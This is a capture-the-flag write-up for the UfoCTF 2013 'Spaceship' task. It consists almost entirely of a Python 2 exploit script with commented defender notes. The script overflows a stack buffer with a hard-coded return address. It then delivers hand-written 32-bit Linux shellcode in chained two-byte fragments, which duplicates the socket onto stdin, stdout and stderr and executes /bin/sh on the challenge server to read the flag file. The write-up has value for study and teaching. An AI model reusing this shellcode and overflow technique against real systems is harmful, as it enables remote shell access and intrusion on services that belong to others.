UfoCTF 2013 Spaceship Write-up

# aXs^Big-Daddy - http://codezen.fr
#
# UfoCTF 2013 "Spaceship" write-up: a Python 2 exploit script (print
# statements, xrange, str-typed byte strings) kept as a record of how the
# task was solved. Everything below is specific to the 2013 challenge
# binary and host: the stack address, the EBP value, the descriptor number
# and the two-byte "ship part" encoding were read off that binary and do
# not transfer to anything else.
#
# Defender's reading: this is a stack overflow with a hard-coded return
# address into stack-resident shellcode, so it presumes a non-randomised
# and executable stack. ASLR and NX/W^X, both default on current systems,
# each break the script as written; a stack canary would stop it before
# the return address is ever used. telnetlib also dates it - the module
# was deprecated in Python 3.11 and removed in 3.13.
import socket
import telnetlib
from struct import pack,unpack
import time

# The code is delivered as 2-byte fragments (see the send loop below), so
# several instructions are padded with a one-byte nop (0x90) to fill a
# fragment; the per-line comments give the full decoding of each pair.
shellcode = ''

# Save ptr to stack
# (ecx holds a pointer at entry; it is parked in edi and later used to
# derive the execve() path argument - presumably it points into the
# buffer holding the ship name, TODO confirm against the binary)

shellcode += "\x89\xcf" #   mov edi,ecx

# dup2(4,x) for x = 2, 1, 0
# syscall 0x3f is dup2 on 32-bit Linux; fd 4 is the same value sent in the
# overflow payload below and is presumably the connection socket, so the
# spawned shell's stderr/stdout/stdin end up tied to the connection.

shellcode += "\x31\xc0" #   xor eax,eax
shellcode += "\x31\xdb" #   xor ebx,ebx
shellcode += "\x31\xc9" #   xor ecx,ecx
shellcode += "\xb1\x02" #   mov cl, 0x2
shellcode += "\xb0\x3f" #   mov al, 0x3f
shellcode += "\xb3\x04" #   mov bl, 0x4
shellcode += "\xcd\x80" #   int 80h
shellcode += "\xb1\x01" #   mov cl, 0x1
shellcode += "\xb0\x3f" #   mov al, 0x3f
shellcode += "\xb3\x04" #   mov bl, 0x4
shellcode += "\xcd\x80" #   int 80h
shellcode += "\xb1\x00" #   mov cl, 0x0
shellcode += "\xb0\x3f" #   mov al, 0x3f
shellcode += "\xb3\x04" #   mov bl, 0x4
shellcode += "\xcd\x80" #   int 80h

# execve
# ebx is advanced 11 + 9 = 20 bytes past the saved pointer (the add below
# uses eax == 0xb), edi a further 7 bytes, and the stosb writes the 0 that
# terminates "/bin/sh" over the 0xFF that follows it in the payload
# (presumably because a NUL could not be sent inside the ship name).

shellcode += "\x89\xfb" #   mov    ebx,edi

shellcode += "\x31\xc9" #   xor    ecx,ecx

shellcode += "\xf7\xe1" #   mul    ecx      ; ecx == 0, so eax = edx = 0

shellcode += "\xb0\x0b" #   mov    al,0xb

shellcode += "\x90\x51" #   nop ; push ecx  (nop pads the fragment)

shellcode += "\x01\xC3" #   add    ebx,eax

shellcode += "\x43\x43" #   inc    ebx ; inc ebx
shellcode += "\x43\x43" #   inc    ebx ; inc ebx
shellcode += "\x43\x43" #   inc    ebx ; inc ebx
shellcode += "\x43\x43" #   inc    ebx ; inc ebx
shellcode += "\x43\x90" #   inc    ebx ; nop

shellcode += "\x89\xDF" #   mov edi,ebx
shellcode += "\x47\x47" #   inc edi;inc edi
shellcode += "\x47\x47" #   inc edi;inc edi
shellcode += "\x47\x47" #   inc edi;inc edi
shellcode += "\x47\x90" #   inc edi ; nop

shellcode += "\x31\xc0" #   xor eax,eax

shellcode += "\xAA\x90" #   stosb ; nop     (writes the terminating 0)

shellcode += "\xb0\x0b" #   mov    al,0xb

shellcode += "\xcd\x80" #   int    0x80

# filler
# The real code is 70 bytes; the send loop below always ships 75 fragments
# (150 bytes), so the tail is nops.

shellcode += "\x90" * 256

# Challenge endpoint from 2013; long gone.
host = 'spaceship.tasks.ufoctf.ru'
port = 4141

tn = telnetlib.Telnet(host, port)

# Fixed delays stand in for real synchronisation throughout; fragile, but
# acceptable for a one-off run.
time.sleep(1)

# Raw socket for the binary payloads; telnetlib is only used for the
# prompt matching (the `socket` import above is otherwise unused).
s = tn.get_socket()

print tn.read_until("Name your spaceship:")

# Overflow payload: the ship name, followed by the fields that sit after
# the buffer in the frame (layout taken from the challenge binary).
message  = "/bin/sh\xFF" # shipname
message += 'Y' * 4 # ptr, will be overwritten
message += pack('<I', 4) # fd
message += 'Z' * 4
message += pack('<I', 0x0804B074) # EBP
#message += pack('<I', 0xbfffeea4) # jump to shellcode
# Absolute stack address: the reason a randomised stack defeats this.
message += pack('<I', 0xbfe67e24) # jump to shellcode

s.send(message)

print tn.read_until("Build your ship:\n")

# Each "ship part" is a 2-byte shellcode fragment plus `jmp short +0x2c`
# (0xEB 0x2C), which chains it to the next part. Fragments go out in
# reverse order (index 74 first); presumably the service stores each new
# part in front of the previous one - TODO confirm against the binary.
for i in xrange(0,75):
    message = shellcode[(74-i)*2:(74-i)*2+2] + "\xEB\x2C"
    print i, repr(message)
    s.send(message)

time.sleep(3)

# Skip to the 0xFF marker.
# NOTE: recv() returns '' on EOF and that is never checked, so this spins
# forever if the connection drops before the marker arrives.
while True:
    a = s.recv(1)
    if a == "\xFF":
        break

# Diagnostics only: print a few 4-byte values that follow the marker;
# nothing below depends on them. recv(4) is not guaranteed to return all
# 4 bytes, and a short read makes unpack() raise struct.error.
ptr = unpack('<I', s.recv(4))[0]
print "ptr=", hex(ptr)
print "dummy=", s.recv(8)
ptr = unpack('<I', s.recv(4))[0]
print "ptr=", hex(ptr)
ptr = unpack('<I', s.recv(4))[0]
print "ptr=", hex(ptr)

time.sleep(3)

# Commands for the spawned shell: list the directory and print "k3y",
# presumably the flag file.
s.send("ls -la;cat k3y\n")

# Relay output until the peer closes the connection (recv returns '').
while True:
    data = s.recv(1024)
    if data:
        print data
    else:
        break